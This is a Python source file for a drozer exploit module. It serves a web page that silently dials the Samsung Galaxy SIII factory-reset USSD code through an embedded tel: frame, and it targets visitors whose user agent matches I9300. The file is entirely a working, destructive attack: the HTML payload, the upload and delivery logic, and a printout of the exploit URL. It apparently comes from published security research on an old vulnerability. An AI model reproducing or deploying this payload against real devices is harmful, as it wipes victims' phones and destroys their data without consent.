from drozer.modules import Module, common

class RemoteWipe_BrowserDelivery(Module, common.Exploit):

    name = "Invoke a USSD code that performs a remote wipe on Samsung Galaxy SIII (Ekoparty 2012)"
    description = """
    Exploit the factory reset USSD code (*2767*3855#) implemented on Galaxy SIII devices over a browser.

    References:

      * https://www.troopers.de/wp-content/uploads/2012/12/TROOPERS13-Dirty_use_of_USSD_codes_in_cellular-Ravi_Borgaonkor.pdf
      * http://www.ekoparty.org/2012/ravi-borgaonkar.php

    Vulnerable: 

      * Samsung Galaxy SIII

    """
    examples = ""
    author = ["Ravishankar Borgaonkar","Tyrone (@mwrlabs)"]
    date = "2013-07-24"
    license = "BSD (3 clause)"
    path = ["exploit", "remote", "dos"]
    module_type = "exploit"
    payloads = []
    
    __template = """
<html>
    <body>
        <frame src="tel:*2767*3855%23" />
    </body>
</html>
    """
    
    def __init__(self, session, loader):
        Module.__init__(self, session)
        common.Exploit.__init__(self, loader)

        self.payload_format = "N"

    def add_arguments(self, parser):
        parser.add_argument("--resource", default=None, help="specify the path component of the resultant exploit URI")
    
    def generate(self, arguments):

        print "Uploading blank page to /...",
        if not self.upload(arguments, "/", " "):
            return

        path = self.generate_or_default_path(arguments.resource)

        print "Uploading web delivery page to %s..." % path.replace("\\",""),
        if not self.upload(arguments, path, self.build_multipart({ ".*I9300.*": self.__template }, "gc0p4Jq0M2Yt08jU534c0p"), headers={ "X-Drozer-Vary-UA": "true; boundary=gc0p4Jq0M2Yt08jU534c0p" }):
            return
        
        print "Done. Exploit delivery page is available on: http://%s:%d%s" % (arguments.server[0], arguments.server[1], path.replace("\\",""))
